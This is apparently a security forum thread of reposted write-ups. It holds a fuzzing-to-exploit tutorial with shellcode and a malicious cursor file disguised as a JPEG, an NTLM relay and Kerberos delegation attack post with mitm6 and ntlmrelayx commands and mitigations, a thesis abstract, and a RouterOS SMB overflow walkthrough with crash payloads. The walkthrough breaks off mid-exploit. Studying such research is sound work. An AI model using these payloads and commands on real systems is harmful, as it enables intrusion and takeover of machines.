"\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40" "\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f" "\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78" "\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5" "\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92" "\xb8\x7f" After making the changes and saving our file as exploitFinal.cur our file should look like this (Tip: use Ctrl+Shift+V in 010 editor to paste as hex): Let’s test each step one last time in ImmDbg to make sure we understand what’s going on. Skipping the access violation (Shift+F9) we land at our breakpoint. Stepping three times (F8) we land at our short jump. Stepping again we (hopefully) land in the middle of our NOPsled. After our nopsled we can see the start of our shellcode. So far so good. Hit F9 to continue execution and you should hopefully see calc.exe spawn as it did in my tl;dr video above. As previously mentioned FastStone Image viewer doesn’t rely on file extensions to identify file types, as a final step let’s rename exploitFinal.cur to a more trustworthy file type such as kitten.jpg. Who would suspect a jpeg (or a kitten)? Root Cause Analysis At this point you may be realising that we have managed to create a full working exploit without actually knowing anything about the underlying vulnerability (apart from it having something to do with biBitCount). In normal circumstances this lazy approach to exploit development will not work. Rarely will the EIP value be read directly from your file without some sort of modification. And on the off chance it is, overwriting values in memory (41414141, 42424242, 43434343. etc.) will either cause a different exception or force it down a separate code path that doesn’t hit our original exception. So if you only came here to see calc get popped, now is a great time to stop reading! ReadFile After a while of searching I found a call to ReadFile() at 0x0040B9F8 that appears to be reading our cursor file. ReadFile() perform 4 reads from our file before the exception occurs. The sizes of which are 0x6, 0x10, 0x28, and then 0x800 bytes. After looking at the CUR/ICO file format the first three reads make perfect sense: ICONDIR Structure (0x6 bytes) ICONDIRENTRY Structure (0x10 bytes) BITMAPINFOHEADER Structure (0x28 bytes) As we know from our original file diffing , the only change is to the biBitCount within BITMAPINFOHEADER, where we changed the value from 0x0001 to 0x3089. So let’s skip to the 0x28 byte read and see what happens to our value. PUSH EAX ; |pBytesRead = 0012F6F8 PUSH EDI ; |BytesToRead = 28 (40.) PUSH ESI ; |Buffer = 0012FB20 PUSH EBX ; |hFile = 0000025C (window) CALL <ReadFile> After the call to ReadFile() we can clearly see our value has been read into the buffer at 0012FB20: Stepping through the code we see that at 005AC6C4, the biBitCount value from our fuzzer( 0x3089) is read into EAX and saved at EBP-34: At 005AC6FD our value of 0x3089 is then read into ECX. 1 is moved into EAX, and then something interesting happens. A logical shift occurs on EAX to the left by CL bits. As we can directly control CL (currently with a value of 0x89), this results in shl 1, 89. This results in a very large value (0x20000000000000000000000). This number is significantly larger than the maximum positive value that can be stored in a 32-bit signed integer. This obviously cannot be saved into EAX, so what does happen? Stepping over this instruction we see EAX now has a value of 0x200 which is then stored at ebp-40. Consulting the x86 guide, it can be found that: “shifts counts of greater than 31 are performed modulo 32” At 005AC72E our value of 0x200 is moved into ECX, before another shift left is performed on it, this time with a shift of 2 bits. So ECX now holds our new value of 0x800. Stepping into the call at 005AC73F (by pressing F7) and stepping once (F8), you will arrive at a call to 0040B9E4 step into this call too. We can now see the call to ReadFile(). Looking at the parameters we can see that ReadFile() will be reading 0x800 bytes into a buffer at 0012F720. This means we can directly control the number of bytes being read into the buffer. The process looks like this: 1. ReadFile() reads 0x28 bytes, including our controlled value of 0x3089 , and places it onto the stack; 2. Our value is then used to perform a logical shift (SHL 1, 89) resulting in a controlled value of 0x200 being saved onto the stack; 3. Another SHL is performed (SHL 200, 2) Resulting in a value of 0x800; 4. This value (0x800) is then passed to ReadFile() asthe “BytesToRead” parameter; 5. 0x800 bytes are read into the buffer at 0012F720. If you think back to the start of this post you will also remember that the cause of the crash was due to Peach modifying biHeight from 0x0001 to 0x3089. For our non-mutated sample.cur the process would be the following: 1. ReadFile() reads 0x28 bytes, including the 0x0001 biHeight value; 2. SHL 1, 01 resulting in a value of 0x02; 3. Another SHL is performed (SHL 02, 2) Resulting in a value of 0x08; 4. 0x08 is then passed to ReadFile() as the “BytesToRead” parameter; 5. 0x08 bytes are read into the buffer at 0012F720. As no bound checking appears to be going on, the buffer is likely expecting 0x08 bytes, but instead receives 0x800. So finally, let’s look at the SEH Chain before and after the call to ReadFile(). Before: After: Conclusion I like to think this post sits somewhere between the basic “Send AAAAA until EIP=414141” tutorials and the more hardcore memory corruption write ups. Obviously it’s still a basic overflow issue, but it does cover a number of things that authors often skip e.g. how the original issue was found, and the root cause of the vulnerability. I’m purely a hobbyist when it comes to memory corruption issues so I suspect there’s a number of technical errors within this post, if you do spot any issues then please contact me and i’ll try and fix them. I hope you enjoyed my MSPaint artwork! Refrences If you enjoyed this post and want to read more similar write-ups then please check out the following links: https://www.fuzzysecurity.com/tutorials.html https://www.corelan.be/index.php/articles/ (Exploit Writing Tutorials) https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/ https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/ http://www.flinkd.org/fuzzing-with-peach-part-1/ Timeline 2016: Issue discovered and reported to vendor 2017: *Crickets* 2018: *Crickets* March 2019: This blog post detailing vulnerability published Daniel C Sursa: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
  23. The worst of both worlds: Combining NTLM Relaying and Kerberos delegation 5 minute read After my in-depth post last month about unconstrained delegation, this post will discuss a different type of Kerberos delegation: resource-based constrained delegation. The content in this post is based on Elad Shamir’s Kerberos research and combined with my own NTLM research to present an attack that can get code execution as SYSTEM on any Windows computer in Active Directory without any credentials, if you are in the same network segment. This is another example of insecure Active Directory default abuse, and not any kind of new exploit. Attack TL;DR If an attacker is on the local network, either physically (via a drop device) or via an infected workstation, it is possible to perform a DNS takeover using mitm6, provided IPv6 is not already in use in the network. When this attack is performed, it is also possible to make computer accounts and users authenticate to us over HTTP by spoofing the WPAD location and requesting authentication to use our rogue proxy. This attack is described in detail in my blog post on this subject from last year. We can relay this NTLM authentication to LDAP (unless mitigations are applied) with ntlmrelayx and authenticate as the victim computer account. Computer accounts can modify some of their own properties via LDAP, which includes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This attribute controls which users can authenticate to the computer as almost any account in AD via impersonation using Kerberos. This concept is called Resource-Based constrained delegation, and is described in detail by Elad Shamir and harmj0y. Because of this, when we relay the computer account, we can modify the account in Active Directory and give ourselves permission to impersonate users on that computer. We can then connect to the computer with a high-privilege user and execute code, dump hashes, etc. The beauty of this attack is that it works by default and does not require any AD credentials to perform. No credentials, no problem If you’ve already read the blog of Elad, you may have noticed that control over a computer account (or any other account with a Service Principal Name) is required to perform the S4U2Proxy attack. By default, any user in Active Directory can create up to 10 computer accounts. Interesting enough, this is not limited to user accounts, but can be done by existing computer accounts as well! If we can get any user or computer to connect to our NTLM relay, we can create a computer account with ntlmrelayx: It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection. These computer account credentials can be used for all kinds of things in AD, such as querying domain information or even running BloodHound: Relaying and configuring delegation Let’s run the full attack. First we start mitm6 to take over the DNS on our target, in this case ICORP-W10 (a fully patched default Windows 10 installation), I’m limiting the attack to just this host here: sudo mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd Now it might take a while before the host requests an IPv6 address via DHCPv6, or starts requesting a WPAD configuration. Your best chances are when the victim reboots or re-plugs their network cable, so if you’re on a long term assignment, early mornings are probably the best time to perform this attack. In either case you’ll have to be patient (or just attack more hosts, but that’s also less quiet). In the meantime, we also start ntlmrelayx using the --delegate-access argument to enable the delegation attack and with the -wh attacker-wpad argument to enable WPAD spoofing and authentication requests: ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access After a while mitm6 should show our victim connecting to us as DNS server for the WPAD host we set: And we see ntlmrelayx receiving the connection, creating a new computer account and granting it delegation rights to the victim computer: Next we can use getST.py from impacket, which will do all the S4U2Self an S4U2Proxy magic for us. You will need the latest version of impacket from git to include resource based delegation support. In this example we will be impersonating the user admin, which is a member of the Domain Admins group and thus has administrative access on ICORP-W10: We obtained a Kerberos Service Ticket now for the user admin, which is valid for cifs/icorp-w10.internal.corp. This only lets us impersonate this user to this specific host, not to other hosts in the network. With this ticket we can do whatever we want on the target host, for example dumping hashes with secretsdump: The attacker now has full control over the victim workstation. Other abuse avenues This blog highlights the use of mitm6 and WPAD to perform the relay attack entirely without credentials. Any connection over HTTP to a host that is considered part of the Intranet Zone by Windows can be used in an identical matter (provided automatic intranet detection is enabled). Elad’s original blog described using WebDAV to exploit this on hosts. Another attack avenue is (again) PrivExchange, which makes Exchange authenticate as SYSTEM unless the latest patches are installed. Tools The updated version of ntlmrelayx is available in a branch on my fork of impacket. I’ll update the post once this branch gets merged into the main repository. Mitigations As this attack consists of several components, there are several mitigations that apply to it. Mitigating mitm6 mitm6 abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don’t use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working: (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In) (Inbound) Core Networking - Router Advertisement (ICMPv6-In) (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out) Mitigating WPAD abuse If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service. Further mitigation and detection measures are discussed in the original mitm6 blog. Mitigating relaying to LDAP Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding. Mitigating resource based delegation abuse This is hard to mitigate as it is a legitimate Kerberos concept. The attack surface can be reduced by adding Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegation. Further mitigations and detection methods are available here. Credits @Elad_Shamir and @3xocyte for the original research and relay POC @agsolino for building and maintaining impacket and implementing all the cool Kerberos stuff @gentilkiwi for Kekeo and @harmj0y for Rubeus and their Kerberos research Updated: March 04, 2019 Dirk-jan Mollema Hacker, red teamer, researcher. Likes to write infosec-focussed Python tools. This is my personal blog mostly containing research on topics I find interesting, such as Windows, Active Directory and cloud stuff. Sursa: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
  24. Daniel Gruss Software-based Microarchitectural Attacks PhD Thesis Assessors: Stefan Mangard, Thorsten Holz June 2017 Modern processors are highly optimized systems where every single cycle ofcomputation time matters. Many optimizations depend on the data that isbeing processed. Software-based microarchitectural attacks exploit effectsof these optimizations. Microarchitectural side-channel attacks leak secretsfrom cryptographic computations, from general purpose computations, orfrom the kernel. This leakage even persists across all common isolationboundaries, such as processes, containers, and virtual machines.Microarchitectural fault attacks exploit the physical imperfections ofmodern computer systems. Shrinking process technology introduces effectsbetween isolated hardware elements that can be exploited by attackers totake control of the entire system. These attacks are especially interestingin scenarios where the attacker is unprivileged or even sandboxed.In this thesis, we focus on microarchitectural attacks and defenses oncommodity systems. We investigate known and new side channels andshow that microarchitectural attacks can be fully automated. Further-more, we show that these attacks can be mounted in highly restrictedenvironments such as sandboxed JavaScript code in websites. We showthat microarchitectural attacks exist on any modern computer system,including mobile devices (e.g., smartphones), personal computers, andcommercial cloud systems.This thesis consists of two parts. In the first part, we provide backgroundon modern processor architectures and discuss state-of-the-art attacksand defenses in the area of microarchitectural side-channel attacks andmicroarchitectural fault attacks. In the second part, a selection of ourpapers are provided without modification from their original publications.1I have co-authored these papers, which have subsequently been anony-mously peer-reviewed, accepted, and presented at renowned internationalconferences Download: https://gruss.cc/files/phd_thesis.pdf
      • 2
      • Upvote
  25. Finding and exploiting CVE-2018–7445 (unauthenticated RCE in MikroTik’s RouterOS SMB) maxi Mar 5 Summary for the anxious reader CVE-2018–7445 is a stack buffer overflow in the SMB service binary present in all RouterOS versions and architectures prior to 6.41.3/6.42rc27. It was found using dumb-fuzzing assisted with the Mutiny Fuzzer tool from Cisco Talos and reported/fixed about a year ago. The vulnerable binary was not compiled with stack canaries. The exploit does ROP to mark the heap as executable and jumps to a fixed location in the heap. The heap base was not randomized. Dumb fuzzing still found bugs in interesting targets in 2018 (although I’m sure there must be none left for 2019!) The post describes the full process from target selection to identifying a vulnerability and then producing a working exploit. Introduction The last few years have seen a surge in the number of public vulnerabilities found and reported in MikroTik RouterOS devices. From a remote buffer overflow affecting the built-in web server included in the CIA Vault 7 leak to a plethora of other vulnerabilities reported by Kirils Solovjovs from Possible Security and Jacob Baines from Tenable that result in full remote compromise. MikroTik was recently added to the list of eligible router brands in the exploit acquisition program maintained by Zerodium, including a one-month offer to buy pre-auth RCEs for $100,000. This might reflect an increasing interest in MikroTik products and their security posture. This blog post is an attempt to make a small contribution to the ongoing MikroTik RouterOS vulnerability research. I will outline the steps we took with my colleague Juan (thanks Juan!) during our time together at Core Security to find and exploit CVE-2018–7445, a remote buffer overflow in MikroTik’s RouterOS SMB service that could be triggered from the perspective of an unauthenticated attacker. The vulnerability is easy to find and exploitation is straight-forward, so the idea is to provide a detailed walk-through that will (hopefully!) be useful for other beginners interested in memory corruption. I will try to cover the full process from “hey! let’s look at this MikroTik thing” to actually finding a vulnerability in a network service and writing an exploit for it. The original advisory can be found here. Mandatory disclaimer: I am no longer affiliated with Core Security, so the content of this post does not reflect its views or represents the company in any way. Setup The vulnerability is present in all architectures and devices running RouterOS prior to 6.41.3/6.42rc27, so the first step is getting a vulnerable system running. MikroTik makes this very easy by maintaining an archive of all previously released versions. It is also possible to download the Cloud Hosted Router version of RouterOS, which is available as a virtual machine that boasts full RouterOS features. This allows running RouterOS in x86–64 architectures using popular hypervisors without needing an actual hardware device. Let’s get the 6.40.5 version of the Cloud Hosted Router from here and create the virtual machine on VirtualBox. Default administrator credentials consist of admin as the username and an empty password. RouterOS administrative console The RouterOS console is a restricted environment and does not allow the user to execute any command outside of a pre-defined set of configuration options. In order to replicate the vulnerability discovery, the SMB service needs to be enabled. This can be achieved with the ip smb set enabled=yes command. Enabling SMB and checking the IP address of the device Note that the fact that the service is not enabled by default makes the likelihood of active exploitation much smaller. In addition, you should probably not be exposing your SMB service to public networks, but well, there’s always those pesky users in the internal network that might have access to this service. The restricted console is not suitable to perform proper debugging, so before looking for vulnerabilities it is useful to have full shell access. Kirils Solovjovs has published extensive research on jailbreaking RouterOS, including the release of a tool that can be used to jailbreak 6.40.5. It would not make sense to repeat the underlying details here, so head to Kirils’ research hub or the more recent Jacob Baines’ post for newer versions where the entry point used for 6.40.5 has been patched. Jailbreaking RouterOS 6.40.5 is as easy as cloning the https://github.com/0ki/mikrotik-tools repository and running the interactive exploit-backup/exploit_full.sh exploit pointing to our VM. Jailbreak tool by 0ki targeting 6.40.5 Finally, download a pre-compiled version of GDB from https://github.com/rapid7/embedded-tools/raw/master/binaries/gdbserver/gdbserver.i686 and upload it to the system using FTP. Connecting to the device via Telnet would allow us to attach to running processes and debug them properly. We are now ready to start looking for vulnerabilities in the network services. Target selection There are lots of services running in RouterOS. A quick review shows common services such as HTTP, FTP, SSH, and Telnet, and some other RouterOS-specific services such as the bandwidh test server running on port 2000. Jacob Baines pointed out that over 90 different binaries that implement network services can be reached by speaking the Winbox protocol (see The Real Attack Surface in his excellent blog post). We were not aware of all that reachable functionality when we started poking around with RouterOS and did not invest the time to reverse engineer the binaries that spoke Winbox, so we just went ahead and looked at the few binaries that were explicitly listening on the network. Most (all?) services in RouterOS seem to have been implemented from scratch, so there are thousands of lines of custom low level code waiting to be audited. Our objective was to achieve unauthenticated remote code execution, and on a first look the binaries for common services such as FTP or Telnet did not provide much reachable functionality without providing credentials. This made us turn to other services that might not be enabled by default but require the implementation of a rich feature set. The fact that these services are not enabled by default means they might have been neglected by other attackers wanting to maximize their ROI on vulnerabilities that affect default installations of RouterOS and are therefore much more valuable. By following this rationale and inspecting the available services we decided to take a look at the SMB implementation. Finding the vulnerability We know we want to find vulnerabilities in the SMB service. We have the virtual machine setup, the service running, we have full shell access to the device and we can debug any processes. How do we find a vulnerability? One option would be to disassemble the binary and look for insecure coding patterns. We would identify interesting operations such as strcpy, memcpy, etc. and see if the correct size checks are in place. We would then see if those code paths can be reached with user controlled input. We could combine this with dynamic analysis and use our ability to attach to a running process with GDB to inspect registers at runtime, memory locations, etc. However, this can be time consuming and it is easy to feel frustrated if you do not have experience doing reverse engineering, especially if it is a large binary. Another option is to fuzz the network service. This approach consists of sending data to the remote service and checking if it causes an unexpected behavior or a crash. This data will contain malformed messages, invalid sizes, very long strings, etc. There are different ways to conduct the fuzzing process. The two most popular strategies are generation and mutation-based fuzzing. Generation-based fuzzing requires knowledge of the protocol to build test cases that comply with the format specified by the protocol and will (most likely) result in a more thorough coverage. More coverage means more chances of hitting vulnerable code paths and therefore more bugs. On the other hand, mutation-based fuzzing assumes no prior knowledge of the protocol being fuzzed and takes much less effort at the cost of potentially poor code coverage and additional difficulties in protocols that need to compute checksums to ensure data integrity. We decided to try our luck with a dumb fuzzer and chose the Mutiny Fuzzer tool that had been released a few months earlier by the Cisco Talos team. Mutiny takes a sample of legitimate network traffic and replays it through a mutational fuzzer. In particular, Mutiny uses Radamsa to mutate the traffic. Radamsa mutation example Performing this kind of fuzzing has the benefit of being very quick to get up running and, as we will see, might provide great results if we have a good selection of test cases that stress various features. Putting this together, the steps to fuzz a network service are: Capture legitimate traffic Create a Mutiny fuzzer template from the resulting PCAP file Run Mutiny to mutate the traffic and replay it to the service Observe what happens with the running service Mutiny does provide a monitoring script that can be used to (d’oh!) monitor the service and identify weird behavior. This can be accomplished by implementing the monitorTarget function as described in https://github.com/Cisco-Talos/mutiny-fuzzer/blob/master/mutiny_classes/monitor.py. Sample checks could be pinging the remote service or connecting to it to assess its availability, monitoring the process, logs, or whatever else might signal weird behavior. In this case, the SMB service will take a while to restart after a crash and log a stack trace message, so we decided it was not worth scripting any monitoring actions. Instead, we just captured the traffic throughout the fuzz process with Wireshark and relied on the default behavior of Mutiny, which is to exit when the request fails due to a connection refused error, meaning that the service is down. This is rather rudimentary and leaves a lot of room for improvement, but it was enough for our tests. It is important to enable full logging before we initiate the fuzzing process. This could prove useful to track any crashes that might occur, as the full stack trace will be included in the logs that are located in /rw/logs/backtrace.log. This can be configured from RouterOS’ web interface. Enable all logs to be written to the disk Another thing that proved useful was running the binary in an interactive console to get the debug output in real time. This can be achieved by killing the running process and relaunching it from the full-fledged terminal. Errors and general status of processed requests will be printed. Get debug output as requests are processed Now that we have a high level overview of the steps involved, let’s recap and actually fuzz the SMB service. First we clone https://github.com/Cisco-Talos/mutiny-fuzzer.git and follow the setup instructions. The next step in our plan consists of generating some network traffic. In order to do this, open Wireshark and attempt to access a resource on the router with smbclient. Smbclient will send a Negotiate Protocol request to port 445/TCP and receive a response which we do not care about. This can be observed in the Wireshark capture. We want to use this request as the starting point to produce (hopefully!) meaningful mutations. Stop the Wireshark capture and save the request packet by going to File -> Export Specified Packets with the request packet selected. Output format should be PCAP. Once we have the PCAP containing the request to fuzz, we prepare Mutiny’s .fuzzer file with the mutiny_prep.py interactive script. It is a good idea to review the resulting file to identify any weirdness that could come up during conversion. Here we could configure Mutiny to fuzz only parts of the message. This would be useful if we wanted for example to focus our efforts on individual fields. In this case we will fuzz the entire message. It is worth mentioning that Mutiny can also handle multi-message exchanges. If the test cases we use as initial templates contain parts that do not cause the program to take different paths, then all the modifications we make to this data will never increase code coverage, which results in wasted time and inefficient fuzzing. Without going into much detail of the SMB protocol, we can observe that the request contains a list of about a dozen Requested Dialects. Each dialect corresponds to a specific set of supported commands. This could be interesting if we were fuzzing a particular set of commands, but right now we do not care about this. Providing a shorter list of one or two dialects would result in Radamsa creating more meaningful mutations and a larger variety of SMB request types being sent. Our reasoning is that maybe mutating one dialect or the other will not make the application take very different paths on a single message conversation, so we do this and edit the template to look as follows: outbound fuzz ‘\x00\x00\x00\xbe\xffSMBr\x00\x00\x00\x00\x18C\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x00\x00\x00\x9b\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00’ With the template in place, we can begin fuzzing. Remember to capture the full session with Wireshark. Mutiny can also record each packet sent, but we found it easier to look at Wireshark for when the server stopped responding after a crash. Open a telnet connection to the router using the devel account and run pkill smb; /nova/bin/smb to start a new SMB process and observe its output. The following command will instruct Mutiny to sleep half a second between packets and log all requests: ./mutiny.py -s 0.5 — logAll negotiate_protocol_request-0.fuzzer HOST The verbose output will show packets of different sizes being sent and the numeric identifier of each of them. This value is useful to repeat the exact same sequence of mutations and provide a way to reproduce crashes. This is important because, even if we find a crash, previous requests could have corrupted something or altered the application state in a way that is required for the crash to happen. If we cannot recreate the state before the crash, we might be left empty-handed even if we identify which particular request ended up causing the crash. If the fuzzing session is interrupted and we do not want to replay the previous mutations, it is possible to use the -r parameter to instruct Mutiny to start sending mutations from that iteration onwards (e.g: -r1500- will send mutations 1500, 1501, 1502, and so on). If we observe Wireshark while the fuzzer runs, we will see that not all packets conform to the expected format, which is a good thing for us. Vulnerabilities usually arise when the application cannot handle unexpected data in a proper manner. The terminal where we are running the SMB binary will also contain useful data to confirm that we are in fact feeding malformed requests to the service. Now we let the fuzzer run. We can play with different delay values and see if the server can process requests that fast, but two requests per second is OK for this proof of concept. A few minutes later Mutiny finishes running after trying to connect to the service and not being able to do so. If we take a look at the terminal running the binary, we will be greeted with a Segmentation fault message. As mentioned before, the backtrace.log file contains the register dump and a bit more information about what caused the crash. Finally, by inspecting Wireshark we can see that the last packet sent to the server is described as “Session request to Illegal NetBIOS name”. Understanding the crash First we will make sure that we can reproduce the crash at will. Copying the last packet sent by Mutiny or extracting the message from Wireshark is equivalent here. We are not interested in the layers below NetBIOS, as we will create a small script to send the packet over TCP. Extract the raw bytes from the exported file. >>> open(“req”).read() ‘\x81\x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00’ Create a simple python script that sends the payload over to the remote service. Note that I have replaced the whitespace with its equivalent hex representation for clarity. Run the script a few times after spawning a new SMB process (pkill smb && /nova/bin/smb) and see what happens. We now have a reliable way to reproduce the crash with a single request. In this case we are dealing with a protocol for which Wireshark has a dissector, so we can use that information to understand the cause of the crash at a protocol level. Apparently, sending a NetBIOS session request (message type 0x81) exercises a vulnerable code path in the SMB binary. Let’s extract the binary from the router so we can open it in a disassembler. Copy /nova/bin/smb to /flash/rw/pckg so it can be accessed via FTP and download it. This is also a good time to be able to debug the process with GDB. I like to use PEDA to enhance GDB’s display and add some useful commands. We open two connections to the target router. In one we do pkill smb && /nova/bin/smb to get real time output, and on the other we start gdbserver attached to the newly spawned process. Finally, we open GDB in our testing machine and connect to the debugging server with target remote IP:PORT. It is also useful to instruct GDB which binary we are attached to by doing file smb. The next time it connects to the debugging server it will attempt to resolve symbols for the loaded libraries. Press c on the debugging session so execution continues as usual. Running the proof of concept will cause the service to stop due to a SIGSEGV as expected. Here we see that a NULL pointer was dereferenced when performing a copy operation. Now, I must admit that I am very bad doing static analysis, especially when C++ programs are involved. In a lame attempt to overcome this limitation, I will rely as much as I can on dynamic analysis and, in this particular case, on the information provided by the Wireshark dissector that gives more insight about the protocol fields. As can be observed, the first byte of the NetBIOS Session Service packet we are sending sets the message type to Session request (0x81). The second byte contains the flags, which in our proof of concept has all bits set to zero. Next two bytes represent the message length, which is set to 32. Finally, the remaining 32 bytes are referred to as Illegal NetBIOS names. We can assume that this size is being read at some point, and since it is the only message length information we are sending, it might be related to the vulnerability. To test this assumption, we are going to place breakpoints on common functions such as read and recv to identify where the application is reading the packet from the socket. After running the script, the program breaks in read(). We navigate to the next instructions using ni and stop right after the read system call is executed. The definition for read looks as follows: ssize_t read(int fd, void *buf, size_t count); EAX holds the number of bytes read, which seems to be 0x24 (36). This corresponds to the header we analyzed before: 1 byte for the message type — 1 byte for the flags — 2 bytes for the message length — 32 bytes for the NetBIOS names. ECX contains the address of the buffer where the data read is stored. We can use vmmap $ecx or vmmap 0x8075068 to verify that this corresponds to the heap area. Finally, EDX states that the read operation was called to read up to 0x10000 bytes from the socket. From here on we can continue stepping through the execution and add watchpoints to see what happens with our data. Since Wireshark did not identify anything relevant to the analyzed protocol in the NetBIOS names, let’s change our payload to contain more distinguishable characters such as “A”s so it is easier to identify that payload in our debugging session. This is also a good idea to see if additional copy operations might be triggered that would otherwise stop at the first NULL byte. We have two bytes to play with different sizes, so before moving forward it is interesting to try sending different message lengths and see if the crash still happens. We already tried 32 bytes, so let’s get crazy and do 64, 250, 1000, 4000, 16000, 65500. 64 (payload = “\x81\x00\x00\x40”+”A”*0x40) Same as original proof of concept. Registers look the same. 250 (payload = “\x81\x00\x00\xfa”+”A”*0xfa) This is a very interesting variation. We see most registers set to 0x41414141, which is our input, we see the stack filled with lots of “A”s as well and even EIP seems to have been corrupted. 1000 (payload = “\x81\x00\x03\xe8”+”A”*0x3e8) Same as previous payload. 4000 (payload = “\x81\x00\x0f\xa0”+”A”*0xfa0) Same as previous payload. 16000 (payload = “\x81\x00\x3e\x80”+”A”*0x3e80) This is crashing at a different instruction, although we see that the stack is corrupted as well. 65500 (payload = “\x81\x00\xff\xdc”+”A”*0xffdc) Same as previous payload. So… we see the program crashes when executing different instructions. However, the common thing we can observe is that the stack has been corrupted at some point when parsing NetBIOS names from a single NetBIOS session request message, and that most registers included parts of our payload when we sent a 250 bytes message. This makes it particularly interesting for analysis, since we have a direct EIP overwrite and control over the stack. Note that we cannot really ensure that all crashes are due to the exact same bug at this point. Maybe sending a larger buffer took us down a different path that ended up being more easily exploitable, so you will have to answer that question yourself. There are also some seemingly random number of “.” (0x2e) characters in between. We will see what they are later on. Right before the crash the program prints a message that reads “New connection:”. This can be useful to get some situational awareness without having to add watchpoints to our buffer and track dozens of read operations (you can add a read watchpoint in GDB with rwatch *addr and execution will be stopped whenever the program accesses that memory address). We open the /nova/bin/smb binary in Binary Ninja and search for the string. There is only one occurrence at 0x80709fb. Inspecting the cross references shows a single usage, which is probably what we want. If we go to the beginning of sub_806b11c, we will notice that a couple of conditions need to be met in order for us to get to the block that prints the string. The first condition is a byte comparison with 0x81, which is the message type we are sending. Putting a breakpoint at 0x806b12e and following the execution allows us to inspect the register values and get a better picture of what is happening. We can observe for example that the size we send in the request needs to be above 0x43 to enter the interesting block. Based on our previous tests, we know that one of the functions called from this block needs to be the one corrupting the stack. We continue going through each instruction in GDB using n instead of s to avoid stepping into the functions. After each function run, we take a look at the stack. The first function we encounter is 0x805015e. After it runs we see that the stack seems to be OK, so this is probably not the function responsible for the overflow. A few instructions later we have the next candidate, function at 0x8054607. Once again, we let it run and observe the stack and register context afterwards. Aaaaand we found our culprit. Take a look at EBP and observe that the stack frame has been corrupted. Continue debugging until the function is about to return. Here various registers are popped from the stack that contains our data. Unpopular thought here: you do not really need to understand what this function is doing at all to exploit the vulnerability. We already have EIP control and most of the stack looks more or less as uncorrupted input data. Taking some time to review the function at 0x8054607 with GDB’s help results in the following pseudo-code: int parse_names(char *dst, char *src) { int len; int i; int offset; // take the length of the first string len = *src; offset = 0; while (len) { // copy the bytes of the string into the destination buffer for (i = offset; (i - offset) < len; ++i) { dst[i] = src[i+1]; } // take the length of the next string len = src[i+1]; // if it exists, then add a separator if (len) { dst[i] = "."; } // start over with the next string offset = i + 1; } // nul-terminate the string dst[offset] = 0; return offset; } In essence, the function receives two stack-allocated buffers, where the source buffer is expected to be in the format SIZE1 — BUF1, SIZE2 — BUF2, SIZE3 — BUF3, etc. “.” is used as the entry separator. The first byte of the source buffer is read and used as the size for the copy operation. The function then copies that amount of bytes into the destination buffer. Once that is done, the next byte of the source buffer is read and used as the new size. This loop finishes when the size to copy is equal to zero. No validation is done to ensure that the data fits on the destination buffer, resulting in a stack overflow. Writing an exploit How to approach the exploitation depends on the specifics of the targeted device and architecture. Here we are only interested in the Cloud Hosted Router x86 binary. It is worth mentioning that there might be several different ways to achieve reliable exploitation of this vulnerability, so we are going to review the one *we* used, which might not be the most elegant or efficient way to do it. Tobias Klein’s checksec script is a great resource to check which mitigations we will need to fight against. This script can be invoked from PEDA. The lack of stack canaries is probably the most relevant mitigation that is missing, enabling stack based buffer overflows to be easily exploited. If the program had been compiled with stack canaries, then our previous tests would have had a very different result. Stack canaries place random values before important data in each function frame that allocates buffers, and these values are checked before the function returns. In case an overflow occurs, execution will be terminated and no further exploitation possible. PIE disabled means we can rely on fixed locations for the program code, and a disabled RELRO means we can overwrite entries in the Global Offset Table. To sum up, we will only be dealing with NX, which restricts execution from writable areas such as the stack or the heap. Another mitigation that is implemented at a system level is ASLR. This is a 32 bits system, so a partial overwrite or even brute forcing may be considered a feasible bypass of ASLR. In this case, that will not be necessary. Inspecting the memory mappings for any program in RouterOS shows that the stack base is indeed randomized but the heap is not. This can be verified running cat /proc/self/maps a few times and comparing the results. The first step to build our exploit is getting the exact offset to get control of EIP. In order to do this we can generate a unique pattern with PEDA with the command pattern create 256 and plug it into our exploit skeleton. Note that the first byte after the header will be the size parsed by the vulnerable function, so we specify 0xFF to read 256 bytes unaltered and avoid the “.” character being placed in the middle of our payload. When the crash takes place, it is possible to use the accompanying pattern offset VALUE command to determine the exact location to overwrite EIP. Alter the payload and verify that EIP can be set to an arbitrary value. We do not observe annoying “.” characters, which is good. Now that we control EIP and the rest of the stack, we can use the borrowed code chunks technique, which is better known as return oriented programming or ROP (some people seem to be very annoyed with those using the latter term, so it is probably better to mention all the alternatives). The main idea is that we will chain various code snippets that end in a RET instruction to execute more or less arbitrary code. Given enough of these gadgets we should be able to run anything we want. In this 